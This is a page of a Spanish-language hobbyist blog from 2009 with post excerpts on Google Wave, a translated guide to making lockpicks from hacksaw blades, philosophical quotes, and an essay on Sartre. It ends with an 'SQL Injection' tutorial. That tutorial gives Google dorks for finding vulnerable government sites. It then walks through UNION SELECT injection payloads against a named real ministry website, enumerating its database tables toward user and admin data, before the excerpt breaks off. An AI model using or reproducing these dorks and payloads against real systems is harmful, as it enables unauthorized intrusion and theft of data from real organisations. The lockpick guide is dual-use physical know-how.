Obama's Elf

Sobre este blog:

Wenas, Bienvenidos a mi blog ;)

Soy uruguayo, tengo 16 y vivo en Montevideo

Espero que este espacio sirva para aprender cosas nuevas y compartir un poco entre todos.



Blogroll: 7

[x] Agregar a lu73k

cereal cereal
murder murder
thanatos thanatos
kaos kaos
nnox nnox
knet knet
ricota ricota

Perfil de lu73k

[x]Nick: lu73k
Rango: Newbie
País: uy
Visitas: 9235
Votos: 15
En Blogrolls: 5
Status: PM

Patrocinadores:


Anuncia aquí

[x] Conociendo Google Wave

Publicado el 02/12/2009 12:12:00 en Noticias. Total de votos: 1  Votar

"Thank you for signing up to give us early feedback on Google Wave. We're happy to give you access to Google Wave and are enlisting your help to improve the product."

En otras palabras aceptaron mi pedido para testear Google Wave y me dieron acceso al mismo pero.... Que es Google Wave???

Según Wikipedia:

Google Wave es una herramienta en línea que permite a sus usuarios comunicarse y colaborar en tiempo real.Es una aplicación web y una plataforma de computación diseñada para unir los servicios de e-mail, mensajería instantánea, wiki, y redes sociales.
Se enfoca fuertemente en el aspecto colaborativo, apoyado por un analizador ortográfico/gramático, traducción automática entre 40 lenguas, y muchas otras extensiones.



Como ven ese es un screen de google Wave tomado personalmente...

Ahora aclaremos que una "Wave"es un mensaje que es compartido entre varias personas, en cada wave se puede ir insertado desde texto, un álbum de fotos hasta un mapa, gráficos, vídeos, juegos,… cualquier cosa que se te ocurra. Todo se puede hacer a traves de la utilización de diferentes gadgets o extensiones...

“Empezamos a preguntarnos cómo sería el correo electrónico si hubiera sido inventado hoy”, dijo Lars Rasmussen
En esto se resume Google Wave, busca llevar un invento de hace 40 años (el e-mail) a la actualidad presentando una nueva forma de comunicacion entre usuarios

Puntos claves a destacar en Google Wave:

1-Colaboración en tiempo real:

Google wave trae la mensajería super-instantánea. Mientras un contacto está enviándote un mensaje, al mismo tiempo en tu pantalla puedes ir viendo letra a letra como escribe. Esto acelera enormemente el flujo de las conversaciones pues ya no es necesario esperar al mensaje para empezar a responder. Todo en tiempo real

2-Función Playback:

En cada wave se incorpora una barra temporal que nos permite movernos entre los eventos sucedidos. Así, aunque no hayamos estado incluidos en ese wave desde el principio, podremos rebobinar y ver la conversación en orden cronológico

3-Waves fuera de la aplicación:

Lo más común será interactuar con los waves dentro de la aplicación pero no tiene porque ser así. Éstos pueden exportarse a otras plataformas sin ningún problema. Podremos integrar un wave en un blog por ejemplo y que nuestros usuarios participen.

4-Robots y Gadgets:

Para hacernos una idea, funcionan de forma similar a las extensiones de Firefox y permiten que por ejemplo, usemos google wave para actualizar nuestro perfil de facebook, enviar SMS, o hacer compras en tiendas online. Aquí es donde reside el potencial monetario del servicio.

5-...

Continúa aquí...


Comentarios: 3 | Leer comentarios

[x] Como hacer tus propias ganzúas

Publicado el 01/12/2009 12:12:00 en Hacking General. Total de votos: 8  Votar

Primero que nada decirles que este es un artículo extraído de la conocida web lockpicking101.com y posteado originariamente por el usuario Olson Burry.
En un intento por hacer llegar este material el cual me resultó interesante me dispuse a traducirlo personalmente y bueno espero que sea de utilidad.

Indice:

- Requerimientos previos
- Seleccionando las láminas de sierra de arco
- Moldeándolas y pulíendolas
- Elaborando los mangos
- Despedida


- Requerimientos previos:

No es necesario ser un experto ni contar con grandes y costosos materiales. Necesitamos unas láminas de sierra de arco, una amoladora, unas lijas, un pegamento plástico y un horno xD


- Seleccionando las láminas de sierra de arco:


Como ven en la imagen dicha lamina se va a transformar en nuestra ganzúa.

Les recomiendo que luego de elegir cual es la lámina mas apropiada, se queden con unas 3 por ejemplo para definir los diferentes tipos de ganzúa que forcejearán los pines de los candados o lo que ustedes quieran abrir jeje.



Como ven en la siguiente imagen es importante que dibujen en la lamina en contorno de la ganzúa así no le pifian




- Moldeándolas y pulíendolas

En un principio es importante deshacernos de la mayor parte de la lámina que no vallamos a usar así que le pueden ir dando forma como se muestra en la siguiente imagen:



Ya pueden empezar a moldear las láminas con la amoladora:







Finalmente llegarían a algo como esto:





Llegado a este punto terminamos con la amoladora y es hora de dejar nuestras ganzúas un poco mas prolijas y presentables xD. Usen la lija para pulirlas y dejarlas lindas.








- Elabora...

Continúa aquí...


Comentarios: 14 | Leer comentarios

Frases para reflexionar un rato.....

Publicado el 12/10/2009 12:10:00 en Off Topic.

"La muerte es una quimera: porque mientras yo existo, no existe la muerte; y cuando existe la muerte, ya no existo yo."
Epicuro de Samos

"¿Quieres ser rico? Pues no te afanes en aumentar tus bienes, sino en disminuir tu codicia!"
Epicuro de Samos

"El hombre es mortal por sus temores e imortal por sus deseos"
Pitagoras

"El supremo arte de la guerra es doblegar al enemigo sin luchar"
Sun Tzu

"Si no sé que no sé, creo que sé. Si no sé que sé, creo que no sé."
Laing

"Hay dos palabras que te abrirán muchas puertas: Tire y Empuje"

"Pez que lucha contra la corriente muere electrocutado"

"El trabajo en equipo es esencial... te permite echarle la culpa a otro."

Continuara...

Frases de una tarde filosofando:

"Aquellos actos impulsivos son aquellos de verdadera importancia, los que reflejan nuestra esencia y determinan lo que somos"

"Las ideas no se roban, se intercambian y la cuestion esta en manejar dicho intercambio"

"La esencia universal surge de la simpleza, porque ir en contra de ella y vivir opulentamente?"

"Aquello que nos hace grande es lo que nos hace ver pequeños pero valerosos"

"A fin de cuentas, de la casualidad surgimos, de la ...casualidad vivimos y por nuestros actos morimos"

Continuación II

"La vida son emociones y mantenemos una adiccion frente a nuestras emociones, estamos por ende obligados a vivir"

Comentarios: 4 | Leer comentarios

[x] Sartre y el Underground

Publicado el 09/10/2009 12:10:00 en Hacking General. Total de votos: 2  Votar

Sartre y el Underground By LU73K


En mis ratos de filósofo suelo meditar sobre el mundo que me rodea y como repercuten las actitudes de las personas en el mundo.
Como dice el título voy a invitarlos a una reflexión sobre la ideología de Sartre y su vinculación que encuentro en el underground.
También planeo incluir un poco de ética y mi punto de vista sobre como deberíamos actuar dentro del underground (Con Undeground meto todo lo vinculado a hacking, informática y demás en una misma bolsa).

Para comenzar voy a mencionar los aspectos mas importantes de Sartre en su ideología.
“La existencia precede a la esencia” es la tesis del existencialismo. Voy a mencionar un ejemplo utilizado por el mismo Sartre para explicar su tesis.
Supongamos que un artesano decide elaborar un corta papel, en dicho caso primero se genera un concepto de que es un corta papel y de sus características que lo definen junto con su función. De aquí surge la esencia del cortapapeles y luego el artesano dará lugar a la existencia del cortapapeles cuando lo elabore.
Dicho esto podríamos señalar que el cortapapeles se pensó antes de ser elaborado y que el artesano es quien determinó la esencia del cortapapeles y por ende su existencia luego.
Sartre señala que al no existir un dios (recordemos su condición de ateo) no existe un artesano que genere un concepto previo de las cosas. Por tanto si el hombre no fue pensado previamente al existir, no pudo tener entonces una esencia definida antes de existir, la existencia precede a la esencia.
El hombre no es otra cosa que lo que el mismo se hace, este es el primer principio del existencialismo.
En definitiva el hombre mismo es quien define su esencia y por tanto el mundo es lo que los hombres hacen que sea.
Al nacer una persona es completamente libre y totalmente responsable señala Sartre. Al ser el hombre un proyecto en construcción somos libres pero también totalmente responsables ya que cuando uno actúa es un modelo de humanidad a seguir para el resto.
Si al ser libres actuamos como queremos es porque creemos que nuestra forma de actuar es la mas adecuada y esto genera que nuestros actos se presenten como modelo a seguir de otros.
Dada esta situación de estar condenados a ser libres hay quienes buscan eludir sus responsabilidades delegándolas a otros, por ejemplo una persona que justifica su matanza a personas por el hecho de que una voz divina le ordenó actuar de esa forma. Para estas personas Sartre señala que actúan en mala fe por el hecho de buscar excusas para quitarse responsabilidad.
Espero que hallan logrado seguir la lectura y comprendido todo, igualmente toda esta información pueden leerla mas detalladamente en el libro de Sartre “El existencialismo es un humanismo”
Ahora, que tiene que ver ...

Continúa aquí...


Comentarios: 8 | Leer comentarios

[x] SQL Injection By LU73K

Publicado el 27/09/2009 12:09:00 en Hacking Web. Total de votos: 4  Votar

Bueno primero que nada hay que saber buscar webs vulnerables, les dejo algunos ejemplos de posibles busquedas con google:

inurl:newsDetail.php?id=
inurl:gov+noticias.php?id=

Basicamente esas son dos lindas formas de buscar webs vunerables, es cuestion de ir probando dorks y pensar que tipo de web estoy buscando pra vulnerar.

En este tuto voy a usar un ejemplo con la web del Ministerio Nacional de Defensa de Camboya para que entiendan que cualquier kaker puede ownear una web X o un gov >.<

Para encontrar un gov en mi caso use el siguiente dork:

inurl:gov.kh+news.php?id=
(kh Camboya)

Me tope con el ministerio y chequie si la web era vulnerable:

http://www.mond.gov.kh/news.php?id='

Efectivamente era vulnerable dado que me tiro error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/mondweb/public_html/news.php on line 55

Despues de esto se buscan tablas colocando despues del “=” “-1+union+select+1--” y ahi seguimos aumentando los números como en el siguiente ejemplo:

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--

Ahí nos arroja unos numeritos que indican que llegamos a una tabla vulnerable.

Ahora vamos a buscar el nombre de la tabla sustituyendo cualquiera de los numeros arrojados en la consulta por “table_name” en nuestra url.

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9--

Despues al final del ultimo nùmero agregamos “+from+information_schema.tables--”

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables--

Como tiene “schema” nos tiro un nombre de tabla por default “CHARACTER_SETS”ahora en caso de que no tuviera “information_schema” ahi estaria complicado porque habria que brutear las tablas y eso lo dejamos para otro tutorial.

Lo que sigue es buscar algun tabla que nos sirva como la de admin o users, cualquier cosa que te permita logearte en el panel de admin o sacar info interesante.

Para seguir conociendo las tablas agregamos “+limit+1,1” y vamos incrementando el primer 1 a medida que nos va dando nombres de las tablas.

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+3,1--

Asi podemos seguir incrementando hasta dar con la tabla o podemos concatenar por grupo y mirar todas las tablas juntas:

http://www.mond.gov.kh/news.php?id=-1+UNION+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9
+from+information_schema.tables--

Obtendriamos el siguiente resultado:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,tblmondnews,tblusers

Hay que tener en cuenta que puede suceder que no se nos muestren todas las tablas en la ventana, cuando ustedes ven qu...

Continúa aquí...


Comentarios: 10 | Leer comentarios